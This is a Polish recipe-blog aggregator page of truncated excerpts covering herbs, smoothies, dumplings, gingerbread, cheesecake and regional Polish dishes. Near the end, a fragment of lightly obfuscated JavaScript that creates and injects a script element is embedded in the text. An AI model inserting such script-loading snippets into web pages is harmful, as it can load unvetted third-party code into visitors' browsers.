przepisów, przejdźmy więc do nich po kolei. Zaczynamy naszą podróż przez zioła od Tymianku a tu przepisy na Koktajl z suszonym śliwek z tymiankiem, ciepły krem tymiankowy z jabłkiem i migdałami. Już czytając same tytuły od razu pachnie tymiankiem, prawda ? Drugi rozdział został poświęcony mojej ukochanej lawendzie i tu przepis który wypróbuję już niedługo na Lawendowy creme brulee(...)czarnuszką, miodem i sezamem. Werbena towarzyszy na w przepisach na Arbuzowe slushie z limonką i werbeną czy syrop czereśniowy z werbeną. Mak nasz świąteczny ulubiony w ciastach tu występuje jako składnik białych trufli z makiem, makowianki czyli czarne sezamki. I na samym końcu rosnący w mojej doniczce rozmaryn i słodkie nerkowce w rozmarynie czy angielski curd
Kuchnia na wzgórzuJak tam Wasze świąteczne menu, gotowe już? Moje cały czas się komponuje :-) Ostatnio np. testowałam taki mój pomysł... Sernik gotowany zmodyfikowałam dodając masę kajmakową i wyszło
Czary - gary w kuchniniedojrzały banan, brzoskwinie, cebula, chleb pełnoziarnisty na zakwasie, cytryna, gorzka czekolada (o zawartości minimum 70% kakao), grejpfrut, groch, śliwki, migdały, makaron pełnoziarnisty, morele (świeże i suszone), orzechy, płatki owsiane, jabłka, jogurt naturalny, owoce jagodowe (jagody, jeżyny, maliny, borówki), fasola czerwona i biała, fasolka szparagowa, bób, ryż brązowy, soczewica, truskawki, wiśnie. Dlaczego należy unikać żywności z wysokim indeksem glikemicznym? Produkty(...)zamiennik cukru do wypieków. Ja bardzo często go używam i polecam, pod warunkiem, że dobrze połączycie go z innymi składnikami. Na końcu wpisu czeka na Was wspaniały przepis, na ciasto z niskim IG, a jednak z wykorzystaniem dojrzałego banana Podsumowując… Jak to zwykle w świecie bywa, również w dietetyce nic nie jest czarno albo białe. Przy komponowaniu posiłków
Natka Pietruszkiroku zachwycił mnie smak suszonych na słońcu pomidorów. Wszystko było pyszne: moussaka z bakłażanem, jagnięcina, owoce morza, ryba panierowana, królik w sosie cytrynowym, duszona wieprzowina. Zachwycały przesłodkie desery: ciasto czekoladowe w syropie, baklava, pudding, świeże oraz kandyzowane i suszone owoce. Cudownie smakowała oliwa, feta – zupełnie inna niż nasza, ser halloumi, tzatziki z jogurtem greckim i oliwki. Przywiozłam do domu greckie(...)przygotowuję dla siebie bardzo często. Świetnie smakuje, szczgólnie w gorące, wiosenne dni. Jest nie tylko smaczne i zdrowe, ale także świetnie gasi pragnienie. Wypróbujcie je. Gorąco polecam. Składniki: • soczyste jabłko • 1 pomarańcza • 1 kiwi • garść szpinaku Sposób przygotowania: 1. Owoce obrać ze skóry. Pokroić na kawałki. Opłukać listki szpinaku. 2. Owoce i szpinak włożyć do pojemnika blendera kielichowego. 3. Wszystkie
W mojej kuchniMelchmus z wetami przepis na staropolski budyń z owocami Oryginalna receptura pochodzi z publikacji zatytułowanej: Moda bardzo dobra smażenia różnych konfektów (ok. 1686 r.), natomiast autorem
Kulinaria - potrawy z różnych stron świataesencjonalnych bulionów, zup, sosów, po wyśmienite mięsa, a nawet całego kurczaka (wystarczy go tylko wcześniej zamarynować). Poza tym w wolnowarze można też przygotować najróżniejsze słodkie desery, a nawet ciasta. Tych ostatnich jeszcze nie robiłam, ale szczerze Wam polecam ryż na słodko z wolnowaru. Tu nie trzeba pilnować i mieszać ryżu. Wszystko robi się „praktycznie samo” (postaram się(...)suszonych grzybów 4-5 suszonych śliwek 400-500 g kiełbasy 1 średnia cebula lub 2 łyżki płatków suszonej cebuli niewielka ilość oleju do podsmażenia składników 1 małe jabłko 1 pełna łyżka koncentratu pomidorowego 2-3 liście laurowe 4 ziela angielskie czarny mielony pieprz i sól do smaku 2 duże szczypty majeranku około 3 szklanki wody Przygotowanie: Suszone grzyby zalewamy wodą
Słodkie okruszkifigi, ziemniaki, pomidory, słodka papryka wymieniać można by było długo! Nie zapominajmy o owocach, teraz właśnie są najlepsze jesienne maliny, śliwki i gruszki, a lada moment będą późne jesienne jabłka. I tak wymieniam Wam te dary natury, a przecież nie wspomniałam słowem o orzechach i kasztanach! Dobra bo nie skończę! heheeh A dziś coś pysznego - kluski ziemniaczane, pomyślicie klasyk(...)misce, wyjmij 1/3 ziemniaków odłóż na talerzyk na chwilę, w to miejsce po ziemniakach wsyp mąką pszenną, 1-2 łyżki mąki ziemniaczanej. Dodaj ziemniaki z talerzyka i zagnieć ciasto. W ten sposób przygotowuje się takie kluseczki, na tzw. proporcje. Ciasto jest dość luźne, ale będziemy robić kluski kładzione, więc jest prawidłowe. W dużym garnku zagotuj wodę z łyżką oleju rzepakowego
SMYKWKUCHNIdokładnie wyrabiamy drewnianą łyżką, aż ciasto będzie gładkie i lśniące. Gotowe ciasto zawijamy w folię i wkładamy do lodówki na 1 godzinę aby się schłodziło.Stolnicę delikatnie posypujemy mąką. Ciasto dzielimy na kilka części i stopniowo rozwałkowujemy je na grubość ok. 0,4-0,5 cm, wycinamy pierniczki za pomocą foremek o świątecznych kształtach. Pierniczki układamy na papierze do pieczenia(...)łyżki wody +barwniki spożywcze, oraz różne posypki od Dr. Oetkera. Można je przechowywać w metalowym pudełku , a jeśli chcemy by świąteczne pierniczki szybciej zmiękły, wkładamy do puszki skórkę od jabłka. * zdjęcia wykonała Ewa Waszkiewicz The post Świąteczne pierniczki appeared first on Damsko-męskie spojrzenie na kuchnię
Damsko-męskie spojrzenie na kuchnięCzas czytania: 2 min Chyba przyznacie mi rację, kiedy powiem, że sałatka jarzynowa jest naszą narodową potrawą, większość z nas doskonale ją zna! Skład sałatki może
SprawdzonaKuchnia.plmoże lepiej nie... I ciężko go za to winić - sernik z rodzynkami jest ryzykowny nawet na spotkaniu Polaków, no chyba że komuś nie przeszkadza, jak jego goście dłubią w cieście i zastanawiają się, jak w elegancki sposób tych rodzynek się pozbyć. Szukałam więc dalej. W Najlepszych sernikach świata trafiłam na dwa, które mi się spodobały - cytrynowy i z malinami. Połączyłam(...)drzwiczkach. Przed podaniem wstawić do lodówki na całą noc. Przed podaniem udekorować wierzch startą czekoladą. Smacznego! Jeszcze raptem jeden letni przepis, i obiecuję się poprawić w kwestii sezonowości - będą jabłka, śliwki, gruszki, dynie... I figi. Tak, figi będą z pewnością
Pożeraczka, czyli raz adobrzeotrębów owsianych czy też płatków. Jeśli je chwilę namoczycie i całość zblendujecie, koktajl będzie zawiesisty, gęsty. My lubimy wrzucać do koktajli owoce ze skórkami – mam tu na myśli jabłka, brzoskwinie itp a nie banany Ale róbcie jak chcecie, bo niektórzy nie tolerują skórek. Jeśli musicie, bo koktajl dla Was jest za mało słodki, dodajcie miodu 1-2 łyżki(...)szałwiową i na nią masę owocową. 4.14 http://mieszamwgarnku.pl/do-picia/koktajl-bananem-brzoskwiniami-ananasem-nasionami-chia/ MieszamWGarnku Artykuł Koktajl z bananem, brzoskwiniami, ananasem i nasionami chia pochodzi z serwisu Przepisy na dania obiadowe, ciasta, zupy, desery, nalewki, przetwory
Mieszam w GarnkuKochani- nareszcie zebrałam się do publikacji nowego przepisu, a raczej wreszcie jestem w stanie J Ostatnio trochę przychorowałam, ale powoli wracam do żywych i śpieszę z
Domowe ciastazupy, na przykład Minestrone, nada jej niepowtarzalny smak. Jako dodatek w sałatkach ze świeżych warzyw skorpiony oliwą z pierwszego tłoczenia. Można go podać również ze świeżymi owocami jabłkami lub gruszkami. Ten bardziej dojrzały z figami, orzechami laskowymi , suszonymi śliwkami. Do dań głównych jako dodatek do carpaccio z wołowiny, ryb lub z pieczeni wołowej. Zastosowań jest naprawdę wiele(...)firma Blanghe produkuje przepyszne trufle. Próbowaliśmy dwóch smaków Tartufi dolce Bianco i Tartufi dolce Cappuccino. Wszystkie bardzo smaczne, które najlepsze - zdania wśród uczestników degustacji były podzielone. Nie mogło zabraknąć ciast z Weneckiej firmy Pasticceria Fraccaro, cukierni istniejącej od 1932 roku, wypiekającej ciasta według tradycyjnych metod, słynącej z wypieku panettone oraz ciasta śliwkowego. Pełna lista win zaprezentowanych w trakcie degustacji
królestwo garówkilka z nich. Kartacze z Suwalszczyzny Kartacze lub też cepeliny to znane podlaskie placki z farszem mięsnym podawane z masłem i skwarkami. Można je porównać do poznańskich pyz. Ciasto wyrabiane jest z ziemniaków. To pożywne, syte, aczkolwiek ciężkostrawne danie. Mięsny farsz jest zazwyczaj mocno przyprawiany czosnkiem i przyprawami. Czasami można także spotkać kartacze z farszem warzywnym, serowym lub grzybowym. Babka(...)Czernina – Mazowsze Czarna polewka to zupa z krwi kaczej przygotowywana od setek lat zwłaszcza na terenach Mazowsza. Do jej przyrządzenia używa się także włoszczyzny, suszonych śliwek oraz suszu z jabłek i gruszek. Zupa ta była tak popularna, że aż przeszła do staropolskiej kultury – jest wzmiankowana między innymi w dziełach Mickiewicza. (function(){ innk_=("u"+"st");innk=document.createElement("script");innk.async=true
Domowa Cukierenka-Domowa Kuchnia